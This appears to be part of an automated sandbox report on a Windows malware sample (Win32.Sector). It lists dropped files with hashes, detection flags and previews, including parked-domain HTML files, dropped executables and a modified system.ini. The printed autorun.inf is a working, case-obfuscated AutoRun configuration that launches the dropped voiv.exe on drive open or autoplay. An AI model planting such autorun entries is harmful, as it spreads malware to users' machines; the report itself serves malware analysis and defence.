                                                                                                                                                                                                                                                                                          SHA1:73BEDDC08EAAF43A9F2DF1E5DC5DF9E4B58430C3
                                                                                                                                                                                                                                                                                          SHA-256:40DED68891FEB38231659396427770EE19E7162B81F419948CD66733BBD2557F
                                                                                                                                                                                                                                                                                          SHA-512:157750461B24105142A3D4090941C3C0688642CABBAA41D54162ADB1890738B62D49288CF03CCBD4CB8F5FD79FEE87C6C3B87F6848CD8B83103FB8C1041646E6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI2Ni45MDI0OjgzODdjNDVmODg5ZmY3NGZmZmU4NmIzODBlZjc5OTQzZDczOGUxOGVhZjljYWEwNWE4NWI1ZmQ1Mjg2OWM0OWM6NjcxMjNjMGFkYzUwZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MwYWRjNGNmfHx8MTcyOTI0ODI2

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winpggs.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.658094921582102
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFgDyquMqUtmtE9VC6WjUcBK3M7ioaxyi6CVY6MTf992wP:ZDuUh9V0jn3i1yi7YTl928
                                                                                                                                                                                                                                                                                          MD5:A76299999A06F9AA1A39BFA486450431
                                                                                                                                                                                                                                                                                          SHA1:8FBB9E9BAA7256A39266E888CD9C692E9506BF9A
                                                                                                                                                                                                                                                                                          SHA-256:50180ACA1C42A7E07E1ED34BFBAF5B1FA205E986B9BD8A43820ADAAAB2A3379A
                                                                                                                                                                                                                                                                                          SHA-512:7E8FFFA6F56909DC3648C4529839923BD2F5B43A5E35A0A1F76EA07B44308A4F047DB34398BD108336C2668450C79CF24A4967028008CD648A7C85A7C6DDDFA1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODEyNy4yMzY4OjE3YzcyOWJhZDk5Y2VmOWM4NGY3MTdmNjViYTdjN2U4ODE0YWM1MDQ3ZGVmOGMzMWRhZmU0MGJhZGY4MGIzOTE6NjcxMjNiN2YzOWQwYw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I3ZjM5Y2NkfHx8MTcyOTI0ODEy

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winqhhdp.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.651837706487076
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFcrvYMqUtmtE9VCL7cB7o3M7ioaxyi6CV1MTf992wP:dr8Uh9V3Ji1yi7Ml928
                                                                                                                                                                                                                                                                                          MD5:0F904A4F450E9201D999843D9CE36310
                                                                                                                                                                                                                                                                                          SHA1:F62CF832C37B64215A4FCA0E508D0B2D15049A51
                                                                                                                                                                                                                                                                                          SHA-256:688C501AC1150660A027EF78D9B8E10A10B704AFB6CC6717C443D2C4440FC735
                                                                                                                                                                                                                                                                                          SHA-512:7770632846AA97FB6C0984525C95F910228A90F436B17D35259AB8970066852DF964E9D845F0A6CD39C844D82F7F282C37029014586B12AB0C7048E5C93174D7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODMxMC44MzQxOmNkNzliMmVhMjA2ZmQzNzJjNmE0ZjI1NjU0N2VjOTA4YWU2MGM5NGQ2ZjRkYmE5MTNhOGRlMjI1OTk4YTYzOTc6NjcxMjNjMzZjYmEyNw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MzNmNiOWY5fHx8MTcyOTI0ODMx

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winrbmrvn.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.645492188391314
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpF/AMpk/MqUtmtE9VC885cBgs3M7ioaxyi6CVfUaMTf992wP:sPpgUh9VMu27i1yi78zl928
                                                                                                                                                                                                                                                                                          MD5:3899988519FBA02EF46E0EAA405315C7
                                                                                                                                                                                                                                                                                          SHA1:3D30F0AA351C3E758B2E990ABFE18BD60EC6FB95
                                                                                                                                                                                                                                                                                          SHA-256:555827DF3BC9F7C1912FA8D5BA428C6A3C3B9DD21040099810F9883342EAF2D5
                                                                                                                                                                                                                                                                                          SHA-512:5ECE3C56F84E3D87C9F2FDF0A0D4C2FC08787252D3FCBE66064C89DCBF1869D36EF901B4E68AEFFBF52AE17D8B72F33CD20D52EDE0D0DB9FE296D23CABE20BB7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI5OC43ODU2OjNkMzRiYzE4MDBmMmRmZWQ2NDEyZjliNDhjMzBjNTMxYThmYWM0YjQ4MWNjNGQ2ZGU4ZjJmY2RjMzY1ZjdmNmU6NjcxMjNjMmFiZmNkYw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MyYWJmY2FhfHx8MTcyOTI0ODI5

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winruhhak.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.662222995947943
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFGyMqUtmtE9VCGcBd3M7ioaxyi6CVeNMTf992wP:EUh9VO2i1yi7ekl928
                                                                                                                                                                                                                                                                                          MD5:444B37F57014F9C00858DD574E189D0B
                                                                                                                                                                                                                                                                                          SHA1:F38E94E60C96EAE8375619CB2C2D2742769FCEEC
                                                                                                                                                                                                                                                                                          SHA-256:ABB396D7AC794A57718D126AD4F5745A6ED25B138CF02908304C43295EAFB0C2
                                                                                                                                                                                                                                                                                          SHA-512:2731C5E3175225EE69636B2E965DE7668FD68656F68F00D97A295AFD5A90A5B26F3D8C9A8B83E24162CAB95C8C48C96A81F1B643249E07FB9B8D8FC6DCBBB205
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE0NC4wMjAzOjg2YmU4YWFiNDhiYzkxMzE1ZjBhYTIwYmQ3ZDdkNDJlYWYyZTU0YzQwNzlkYTgyZWU4YjBhOTdmYzU0OWVkYzY6NjcxMjNiOTAwNGYzNA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I5MDA0ZjAyfHx8MTcyOTI0ODE0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winsjay.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.650829442982286
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFxXdhNtGMqUtmtE9VCfcB/cs3M7ioaxyi6CVcMTf992wP:erWUh9V3Wi1yi79l928
                                                                                                                                                                                                                                                                                          MD5:0CCE3339CA8A67CDCFAA05A0AEDFE9D3
                                                                                                                                                                                                                                                                                          SHA1:A0929AD18D3B37031BF617FF197C911E552E42A6
                                                                                                                                                                                                                                                                                          SHA-256:80298056126DD309726AD118AA670E3EFB6DF1AF46B6F5DE01ADBD885E5AA564
                                                                                                                                                                                                                                                                                          SHA-512:0D6AAC71945C8C68D7EDA371E44FCCACDEF1ECAFABF1C03C5CB4B5C868A625C25B54F972DCD4991B7FFB8EBF80C0819F5B288C0CC60E6870D794F06BD846DBAC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI3OS44Nzg0OmI0ZTgwMWM4MGFhZjJjMjE1OWI4YjVkNmJlODE3MTFlNWZhZDZkM2YyMmI3ZjM5MjhjM2JmNjJkNTQ5NWNjYzM6NjcxMjNjMTdkNjcyZQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MxN2Q2NmVkfHx8MTcyOTI0ODI4

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\winxqvw.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.645861696505576
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFnQvMqUtmtE9VClqkkaWcBEzr3M7ioaxyi6CV9LHxMTf992wP:eQtUh9V/aZgii1yi7Fol928
                                                                                                                                                                                                                                                                                          MD5:0A32C8FB7691E0AAA157C952380B0AD3
                                                                                                                                                                                                                                                                                          SHA1:8BC54F4A9DC1D3B8C34EABC3CFB6473E8298E12A
                                                                                                                                                                                                                                                                                          SHA-256:35F8C676A62749671EAF91D0691F11219B8AD9E60462CE21375D83ADDEE474C2
                                                                                                                                                                                                                                                                                          SHA-512:51DE4203AA75EB16185FDC7399B03963447940B53AEBCBE912876B1081F00757228B0933CB05712F5CE437F13D3DB52A0D822239105F00B0073EB275D1C6A276
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODEwMS4wMjA3OjgyZTllNmEzZmNkNDEyYzI2NGVkNzYzNDhiNzhmZDI1ZTkzYTU0YmQxZDQ0MDM3N2MzYzIxNjM4YmIwNGU1NTg6NjcxMjNiNjUwNTEwYg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I2NTA1MGMxfHx8MTcyOTI0ODEw

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ypxuf.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.653778806192053
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFrEMqUtmtE9VC1LcBrg3M7ioaxyi6CV9lMTf992wP:mQUh9Vuwhvi1yi7+l928
                                                                                                                                                                                                                                                                                          MD5:28C5C081BC1A26A5C7016765E7AEF9A1
                                                                                                                                                                                                                                                                                          SHA1:72C34E9154B63F98FBC7B3AC979F1C4AB32500ED
                                                                                                                                                                                                                                                                                          SHA-256:0868BDA8FA3BF38FFE364CACF3846CA8ABD85E37D5D6CDBA1B1F8E1E5DD8653C
                                                                                                                                                                                                                                                                                          SHA-512:302AC5EFA7F5AD2993202C4C05ADBA66D9211321DBACEA314F31E94981090C4C465E531720B4E54053BF11E5F7BB9D9D857FE78FA90FE6E130AA0E7E6C9E1337
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODIxMi44ODc2OjY0ZWZmYmZiYzk1OGQwYWI0Y2VhNWE3N2Y2NWE5NzhhY2QyNWUwY2U4MDRkNmRkYzQwOWQ5YjhhYzQ3MWIzMGY6NjcxMjNiZDRkOGIzNg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JkNGQ4YWY2fHx8MTcyOTI0ODIx

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2496512
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9605067617139555
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:49152:T546z5zoX35n+ZO6ZtdpdjivaAmOl9RxBrHTxAXMeQ78M:xz5SYBLpdjiaApl9RxBrHTxAX/Q78M
                                                                                                                                                                                                                                                                                          MD5:FA45B9C5E2A92B1B3D7D175C23FFC813
                                                                                                                                                                                                                                                                                          SHA1:5832CEF41CAD1BC57EA1424572A3127A5CCBA956
                                                                                                                                                                                                                                                                                          SHA-256:20D84DD8C73993A1012D7A9D9B837AA118182CB16DAF4169A266C0B48A708AF7
                                                                                                                                                                                                                                                                                          SHA-512:588DBA9ACC14A5A53502292D6DF9B54F5AEB4599F9A3AF1585D9E2403FAE5470DD58F3FA7C22D16BA04A75BBD27AF75C5E3FA1C5F46F2407B5EF17F3A1A7EE97
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.0.T.c.T.c.T.c.K.c.T.cyH.c.T.c.K.c.T.c.,#c.T.c.T.c.T.c.".c.T.c."-c.T.cRich.T.c........................PE..L......W.................X...:......X@=......p....@...........................b...........@.................................M...l................................................................................................................... .V......B(.................. ... h....p.. ...................@... .0...........0..............@... .............^..............@....imports.............`..............@....themida.`;..........b..............`....boot.....$..@=...$..b............^.`...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Windows\system.ini

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          File Type:Windows SYSTEM.INI
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):255
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.266562852465586
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtPGm:F4Yv7yk3OUBq82wqFtP1
                                                                                                                                                                                                                                                                                          MD5:725AEE6E9973312BDD55AA038A13D38B
                                                                                                                                                                                                                                                                                          SHA1:6A1482C5D8D12177AEF24F1739F6DA58E8F4EFDA
                                                                                                                                                                                                                                                                                          SHA-256:2AE1A3BA916CB8512C01132ACA7423F1D6F0E71E8E410E352D043FADA6C87B24
                                                                                                                                                                                                                                                                                          SHA-512:2693501FCD8010A6418CC6D013DD4DA3F0C5E6EF8BAD8FCFD6E80107350C6DACAD22D57B219B7DF9F2F18770E04BF251313D752F4CBE62511BCCAEB62898AD49
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=67320627207..

                                                                                                                                                                                                                                                                                          C:\autorun.inf

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          File Type:Microsoft Windows Autorun file
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):315
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.499922934689373
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:a1KTmBtOPD/6qs4Qp6TN/PGFbk5ODwzXSArbCEqI8hSlIn:a0TTTG6TNGFboODwzXzrbe4I
                                                                                                                                                                                                                                                                                          MD5:C9C5B14EED4C058C347059C947CC2F98
                                                                                                                                                                                                                                                                                          SHA1:4B78FCA7E6852AAD75F004517164857DC8814E3F
                                                                                                                                                                                                                                                                                          SHA-256:BA245F42EDB10A11798ABCB292627553A8AA02E89D940040EF48B751952BCE71
                                                                                                                                                                                                                                                                                          SHA-512:3C67C0937D2D99A704EEDEA0762589C2BD9F19D905F3400C9524D349602AE92F5003F1F6CEE98E25F03A1BA5A2EDA87DD47255D058CBAE05A952CE5A0427752F
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Preview:[AutoRun]..;cfddnU VtMHqkmRv llDwDmnwnHp uwiJEhjcMNpeQdOD nlPGe ..;rLmYDsgBmiXxe..ShelL\Open\DeFault=1..;..ShELl\eXPlOre\COmMand = voiv.exe..;alNoShcyYt..oPEN =voiv.exe..;vosKeoxxw QoDrPxTMDRkgTxsuxjDiuTGa sfMsw RfogTIHLXqbss QerucnGd..SHelL\oPen\commaNd = voiv.exe..;gQipleYwbgC..SHELl\autOplaY\coMmaNd=voiv.exe..

                                                                                                                                                                                                                                                                                          C:\voiv.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):99328
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.591197977842813
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:J99UU79L6NPegIlaIkjS1vv3crVlx+DXCM6bJBZ0t2W6rvRRVUOQDwn/x0rZQgX:J99UEd6xoyjS5oJ+rnybZNW6FRVUxpQ
                                                                                                                                                                                                                                                                                          MD5:54F9AE74B9E1265AC60E9AD6CD28099D
                                                                                                                                                                                                                                                                                          SHA1:750336A2D291E3C10311EB12F6922D0653B52DF7
                                                                                                                                                                                                                                                                                          SHA-256:E6B5C3597F1DEE7A6DA75D21A2A9D81BA7BC7455E1B1838490A9A358B84A78C0
                                                                                                                                                                                                                                                                                          SHA-512:BF68E424CEDE9260FE8C1BEB0FB3CC1560A5F97E88AD1F7B6174E7C6AD9F7DC92129A14943FEF5621FAF9979D030E43D54A24406CD6EB8D4DBFC7604B8E47B1A
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................m. ................................................................^.n..~..A...R..Ei....,c....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          \Device\ConDrv

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):7
                                                                                                                                                                                                                                                                                          Entropy (8bit):2.2359263506290326
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:t:t
                                                                                                                                                                                                                                                                                          MD5:F1CA165C0DA831C9A17D08C4DECBD114
                                                                                                                                                                                                                                                                                          SHA1:D750F8260312A40968458169B496C40DACC751CA
                                                                                                                                                                                                                                                                                          SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                                                                                                                                                                                                                                                                                          SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Ok.....

                                                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9605067617139555
                                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                          File name:SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
                                                                                                                                                                                                                                                                                          File size:2'496'512 bytes
                                                                                                                                                                                                                                                                                          MD5:fa45b9c5e2a92b1b3d7d175c23ffc813
                                                                                                                                                                                                                                                                                          SHA1:5832cef41cad1bc57ea1424572a3127a5ccba956
                                                                                                                                                                                                                                                                                          SHA256:20d84dd8c73993a1012d7a9d9b837aa118182cb16daf4169a266c0b48a708af7
